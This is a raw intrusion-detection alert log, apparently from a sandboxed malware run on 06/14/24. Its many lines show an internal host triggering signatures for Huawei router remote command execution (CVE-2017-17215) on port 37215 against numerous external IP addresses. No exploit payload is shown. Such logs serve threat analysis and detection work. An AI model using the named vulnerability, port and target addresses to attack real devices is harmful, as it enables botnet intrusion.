                                            06/14/24-10:43:56.242806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5456037215192.168.2.1441.61.228.180
                                            06/14/24-10:44:29.012502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4695037215192.168.2.1441.92.248.64
                                            06/14/24-10:43:36.716944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4857437215192.168.2.14156.106.88.214
                                            06/14/24-10:43:37.759613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3363437215192.168.2.14156.253.224.25
                                            06/14/24-10:44:16.718500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5021437215192.168.2.14156.58.30.32
                                            06/14/24-10:43:50.074928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5905037215192.168.2.14156.241.213.209
                                            06/14/24-10:44:10.545274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4312637215192.168.2.14197.65.39.163
                                            06/14/24-10:43:41.898324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3419837215192.168.2.1441.236.231.183
                                            06/14/24-10:43:48.019009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5110437215192.168.2.14197.86.23.178
                                            06/14/24-10:44:16.719043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5045237215192.168.2.14156.184.227.221
                                            06/14/24-10:44:00.323263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4232037215192.168.2.14156.234.127.134
                                            06/14/24-10:43:36.703993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4660437215192.168.2.1441.107.169.248
                                            06/14/24-10:44:04.411996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4346837215192.168.2.14197.47.53.10
                                            06/14/24-10:44:24.943850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3780037215192.168.2.14197.237.77.162
                                            06/14/24-10:43:34.677803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4313037215192.168.2.1441.231.252.57
                                            06/14/24-10:44:00.324203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3673437215192.168.2.14197.148.241.231
                                            06/14/24-10:43:48.020942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5061637215192.168.2.14156.18.159.107
                                            06/14/24-10:44:00.337246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3359837215192.168.2.14197.146.97.147
                                            06/14/24-10:44:31.078752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4963237215192.168.2.14197.200.215.143
                                            06/14/24-10:43:39.789478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5891837215192.168.2.1441.157.37.124
                                            06/14/24-10:44:18.762916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3551037215192.168.2.14197.99.229.98
                                            06/14/24-10:44:04.421792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5448437215192.168.2.14197.145.222.221
                                            06/14/24-10:43:52.159874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3933437215192.168.2.1441.43.62.143
                                            06/14/24-10:43:39.813199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4418037215192.168.2.1441.221.11.44
                                            06/14/24-10:43:54.201458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5496437215192.168.2.14197.20.14.43
                                            06/14/24-10:44:14.670685TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5420237215192.168.2.14156.230.111.82
                                            06/14/24-10:44:31.089792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5568637215192.168.2.14156.203.21.171
                                            06/14/24-10:44:22.882169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5304437215192.168.2.1441.174.193.182
                                            06/14/24-10:43:56.228515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3513037215192.168.2.14156.51.216.95
                                            06/14/24-10:44:06.448727TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5097837215192.168.2.1441.176.170.28
                                            06/14/24-10:43:56.253694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3783637215192.168.2.1441.87.249.147
                                            06/14/24-10:44:04.407245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5673637215192.168.2.14197.163.57.236
                                            06/14/24-10:44:18.763601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4802037215192.168.2.1441.54.27.54
                                            06/14/24-10:43:52.149362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3699837215192.168.2.14197.253.61.3
                                            06/14/24-10:44:12.618453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4748837215192.168.2.1441.160.228.255
                                            06/14/24-10:43:56.250697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5537037215192.168.2.14197.67.7.217
                                            06/14/24-10:43:34.661427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3598837215192.168.2.1441.216.220.242
                                            06/14/24-10:44:02.384973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3854437215192.168.2.14197.84.54.31
                                            06/14/24-10:44:14.670590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4061637215192.168.2.14156.254.206.176
                                            06/14/24-10:43:56.242032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5032437215192.168.2.1441.236.117.155
                                            06/14/24-10:43:43.942742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5371437215192.168.2.14156.208.175.175
                                            06/14/24-10:44:20.807575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3476837215192.168.2.1441.182.167.228
                                            06/14/24-10:43:52.143601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5403037215192.168.2.1441.137.18.0
                                            06/14/24-10:43:45.985345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4811837215192.168.2.14156.86.138.235
                                            06/14/24-10:44:26.986276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5961237215192.168.2.14197.34.37.201
                                            06/14/24-10:44:18.761921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5089237215192.168.2.1441.223.71.100
                                            06/14/24-10:44:10.546904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4608237215192.168.2.14197.66.123.23
                                            06/14/24-10:43:58.293638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3518837215192.168.2.1441.7.218.247
                                            06/14/24-10:44:22.861191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5239237215192.168.2.14197.236.137.143
                                            06/14/24-10:43:39.792440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3959837215192.168.2.14197.41.131.92
                                            06/14/24-10:43:41.906035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3703237215192.168.2.14197.216.12.11
                                            06/14/24-10:43:58.288660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4953437215192.168.2.14156.201.121.159
                                            06/14/24-10:43:48.017009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6060037215192.168.2.14156.114.121.196
                                            06/14/24-10:43:36.704326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5179237215192.168.2.1441.144.155.123
                                            06/14/24-10:44:14.683026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4519237215192.168.2.14156.161.196.255
                                            06/14/24-10:44:10.567207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3874637215192.168.2.14156.193.178.117
                                            06/14/24-10:43:39.812665TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3597837215192.168.2.14156.183.127.88
                                            06/14/24-10:44:31.083757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5759037215192.168.2.1441.5.57.143
                                            06/14/24-10:43:58.277824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3856437215192.168.2.1441.204.39.162
                                            06/14/24-10:44:31.082575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4117037215192.168.2.14197.185.44.146
                                            06/14/24-10:43:43.941702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3943437215192.168.2.14156.247.142.114
                                            06/14/24-10:44:12.616630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4517437215192.168.2.14156.32.70.115
                                            06/14/24-10:44:04.411917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3638437215192.168.2.14197.183.212.159
                                            06/14/24-10:44:24.914195TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5368037215192.168.2.1441.193.138.165
                                            06/14/24-10:43:39.808128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3460037215192.168.2.14197.117.114.229
                                            06/14/24-10:43:39.790923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4603837215192.168.2.14156.93.123.151
                                            06/14/24-10:44:02.382668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3407037215192.168.2.14156.24.127.200
                                            06/14/24-10:44:24.932681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4625837215192.168.2.14156.11.200.245
                                            06/14/24-10:43:36.702259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4478037215192.168.2.14197.63.24.17
                                            06/14/24-10:44:12.624946TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4979037215192.168.2.14156.184.34.249
                                            06/14/24-10:44:33.148814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4498637215192.168.2.1441.237.68.187
                                            06/14/24-10:44:31.079028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6013437215192.168.2.1441.98.62.141
                                            06/14/24-10:44:31.052120TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5283637215192.168.2.1441.5.208.183
                                            06/14/24-10:43:37.762396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4109637215192.168.2.14156.104.229.129
                                            06/14/24-10:44:33.132557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5789237215192.168.2.1441.22.63.32
                                            06/14/24-10:44:16.734938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5342237215192.168.2.14197.89.136.179
                                            06/14/24-10:43:37.762380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4838237215192.168.2.14197.53.31.254
                                            06/14/24-10:44:16.716837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3462837215192.168.2.1441.127.173.236
                                            06/14/24-10:43:58.291722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3503437215192.168.2.14197.193.70.156
                                            06/14/24-10:43:45.968781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4492837215192.168.2.14197.65.69.61
                                            06/14/24-10:44:12.615962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4310837215192.168.2.1441.227.169.149
                                            06/14/24-10:43:43.940561TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4938637215192.168.2.14197.186.61.168
                                            06/14/24-10:44:10.569229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4631437215192.168.2.14156.62.247.61
                                            06/14/24-10:43:39.789458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5052437215192.168.2.1441.38.218.184
                                            06/14/24-10:44:29.024526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5664037215192.168.2.14156.34.214.9
                                            06/14/24-10:44:24.917438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5971637215192.168.2.14197.135.35.201
                                            06/14/24-10:43:39.790702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5476637215192.168.2.14156.121.18.120
                                            06/14/24-10:44:08.504570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4938037215192.168.2.14197.78.49.23
                                            06/14/24-10:43:50.072997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3649037215192.168.2.14156.110.7.155
                                            06/14/24-10:44:18.777158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3338237215192.168.2.14156.214.176.72
                                            06/14/24-10:44:22.879972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5996037215192.168.2.14197.174.224.70
                                            06/14/24-10:44:00.324119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5148037215192.168.2.14156.148.41.247
                                            06/14/24-10:44:06.472697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3310837215192.168.2.1441.188.26.2
                                            06/14/24-10:43:58.275405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5434037215192.168.2.1441.197.173.210
                                            06/14/24-10:44:00.326450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3474237215192.168.2.14156.207.69.18
                                            06/14/24-10:44:12.644442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5444637215192.168.2.14156.54.36.47
                                            06/14/24-10:43:56.230141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4581437215192.168.2.1441.112.253.45
                                            06/14/24-10:44:02.381385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3761437215192.168.2.1441.255.169.157
                                            06/14/24-10:44:02.384278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4872837215192.168.2.14156.179.183.35
                                            06/14/24-10:43:39.807926TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5507837215192.168.2.14197.240.119.112
                                            06/14/24-10:44:10.580803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4293237215192.168.2.14197.9.93.81
                                            06/14/24-10:43:34.662859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5863237215192.168.2.14197.96.60.42
                                            06/14/24-10:44:35.181397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4512837215192.168.2.14197.205.34.6
                                            06/14/24-10:44:14.682748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5349637215192.168.2.14197.39.158.207
                                            06/14/24-10:44:00.325059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4045437215192.168.2.1441.43.54.245
                                            06/14/24-10:44:31.092872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4625637215192.168.2.14156.138.156.177
                                            06/14/24-10:43:54.202275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4873437215192.168.2.1441.119.155.206
                                            06/14/24-10:43:45.969071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4655037215192.168.2.14156.40.24.251
                                            06/14/24-10:44:29.014229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4754837215192.168.2.14156.80.15.36
                                            06/14/24-10:43:37.759524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3484637215192.168.2.1441.93.110.50
                                            06/14/24-10:43:45.968454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5015437215192.168.2.14197.45.201.101
                                            06/14/24-10:43:58.289753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3805237215192.168.2.14156.127.125.133
                                            06/14/24-10:44:18.761645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4708837215192.168.2.14156.101.243.41
                                            06/14/24-10:43:41.907137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4458037215192.168.2.14156.76.202.75
                                            06/14/24-10:44:18.778331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6084837215192.168.2.14197.222.158.52
                                            06/14/24-10:43:45.968480TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4737037215192.168.2.14156.187.63.164
                                            06/14/24-10:44:14.670472TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5751237215192.168.2.14197.120.57.43
                                            06/14/24-10:44:10.566409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6060037215192.168.2.1441.194.202.153
                                            06/14/24-10:44:35.177813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4996437215192.168.2.14197.161.250.38
                                            06/14/24-10:44:02.384441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4281437215192.168.2.14197.108.108.95
                                            06/14/24-10:44:29.024217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5276637215192.168.2.14197.62.242.90
                                            06/14/24-10:43:41.910512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5556237215192.168.2.14156.86.110.27
                                            06/14/24-10:43:52.163692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3850437215192.168.2.1441.48.213.226
                                            06/14/24-10:43:43.941538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6018237215192.168.2.1441.27.40.116
                                            06/14/24-10:44:33.132836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4855637215192.168.2.14197.79.190.194
                                            06/14/24-10:43:54.201533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4298237215192.168.2.14197.122.54.17
                                            06/14/24-10:43:50.074762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3869637215192.168.2.14156.140.0.214
                                            06/14/24-10:43:56.253873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5763037215192.168.2.14156.253.202.25
                                            06/14/24-10:44:04.404738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5435437215192.168.2.1441.158.205.85
                                            06/14/24-10:44:22.858558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5258837215192.168.2.14197.87.87.189
                                            06/14/24-10:44:22.861561TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4457837215192.168.2.14156.68.196.18
                                            06/14/24-10:43:45.990060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3662837215192.168.2.14156.75.243.74
                                            06/14/24-10:44:24.915745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3515437215192.168.2.14156.163.217.73
                                            06/14/24-10:43:34.663829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5297837215192.168.2.14156.59.140.170
                                            06/14/24-10:44:02.381791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5576237215192.168.2.14197.207.24.1
                                            06/14/24-10:43:54.202370TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5626037215192.168.2.1441.7.113.169
                                            06/14/24-10:44:31.078592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3738837215192.168.2.14197.104.133.243
                                            06/14/24-10:44:22.860883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5323837215192.168.2.1441.246.218.249
                                            06/14/24-10:44:18.779137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3655637215192.168.2.1441.109.120.194
                                            06/14/24-10:43:34.660897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3433437215192.168.2.14156.67.95.193
                                            06/14/24-10:44:08.520285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4958837215192.168.2.14197.43.99.88
                                            06/14/24-10:44:29.012895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4224037215192.168.2.14197.68.148.58
                                            06/14/24-10:43:58.274168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4903437215192.168.2.14156.18.249.33
                                            06/14/24-10:44:22.881088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3395637215192.168.2.14197.227.252.180
                                            06/14/24-10:44:35.181529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3394637215192.168.2.14156.107.241.15
                                            06/14/24-10:44:06.451714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6048437215192.168.2.14156.122.137.27
                                            06/14/24-10:43:43.970924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6032037215192.168.2.1441.200.226.238
                                            06/14/24-10:43:56.227184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4200237215192.168.2.14156.86.166.177
                                            06/14/24-10:43:48.017719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5100037215192.168.2.1441.31.189.227
                                            06/14/24-10:44:04.410258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3318437215192.168.2.14156.223.167.97
                                            06/14/24-10:44:10.542836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4318637215192.168.2.1441.91.149.225
                                            06/14/24-10:43:41.896328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4203037215192.168.2.14197.254.137.241
                                            06/14/24-10:44:14.669211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4269637215192.168.2.1441.143.118.160
                                            06/14/24-10:43:43.941743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3781437215192.168.2.14197.219.57.48
                                            06/14/24-10:43:39.808834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3776037215192.168.2.1441.165.218.63
                                            06/14/24-10:43:45.967603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5001837215192.168.2.14197.83.255.142
                                            06/14/24-10:44:26.978113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5719637215192.168.2.1441.205.197.188
                                            06/14/24-10:43:43.942355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5411837215192.168.2.14197.238.128.19
                                            06/14/24-10:44:16.734301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4514037215192.168.2.14156.89.69.61
                                            06/14/24-10:43:36.718049TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432237215192.168.2.14197.69.119.231
                                            06/14/24-10:44:08.517263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3713237215192.168.2.1441.64.221.58
                                            06/14/24-10:44:14.688883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3309237215192.168.2.14197.206.57.245
                                            06/14/24-10:43:54.203146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4686437215192.168.2.14197.164.125.180
                                            06/14/24-10:44:14.681549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3605437215192.168.2.14197.3.122.209
                                            06/14/24-10:44:18.766314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4312637215192.168.2.14156.147.113.230
                                            06/14/24-10:44:02.367058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5241237215192.168.2.14156.94.50.177
                                            06/14/24-10:44:12.640453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3527037215192.168.2.14197.50.10.225
                                            06/14/24-10:43:34.677158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3918437215192.168.2.14197.240.94.26
                                            06/14/24-10:44:04.423723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3550037215192.168.2.14156.214.126.155
                                            06/14/24-10:43:34.675772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5404837215192.168.2.14197.142.78.120
                                            06/14/24-10:44:00.325582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5251237215192.168.2.1441.158.255.149
                                            06/14/24-10:44:00.339034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3890237215192.168.2.14156.72.183.252
                                            06/14/24-10:44:12.645354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4064637215192.168.2.14197.202.91.54
                                            06/14/24-10:44:33.133655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6045037215192.168.2.1441.14.73.181
                                            06/14/24-10:44:06.452242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4605037215192.168.2.14197.127.230.11
                                            06/14/24-10:44:04.406537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4322637215192.168.2.14156.74.243.68
                                            06/14/24-10:44:29.028013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414237215192.168.2.1441.63.132.110
                                            06/14/24-10:44:31.084698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5908637215192.168.2.1441.165.165.187
                                            06/14/24-10:43:52.149252TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3860437215192.168.2.14156.29.158.134
                                            06/14/24-10:43:54.182033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3590437215192.168.2.1441.244.140.124
                                            06/14/24-10:44:18.761743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4944237215192.168.2.1441.139.175.97
                                            06/14/24-10:44:08.518773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4382437215192.168.2.14156.111.74.131
                                            06/14/24-10:44:00.321197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4419237215192.168.2.14197.55.128.247
                                            06/14/24-10:44:10.569524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4306637215192.168.2.1441.229.90.81
                                            06/14/24-10:43:43.972151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4187837215192.168.2.14197.250.252.72
                                            06/14/24-10:44:16.734996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4821237215192.168.2.14156.86.111.92
                                            06/14/24-10:44:06.470931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4488037215192.168.2.14156.156.53.220
                                            06/14/24-10:44:29.022456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5301637215192.168.2.14156.204.63.78
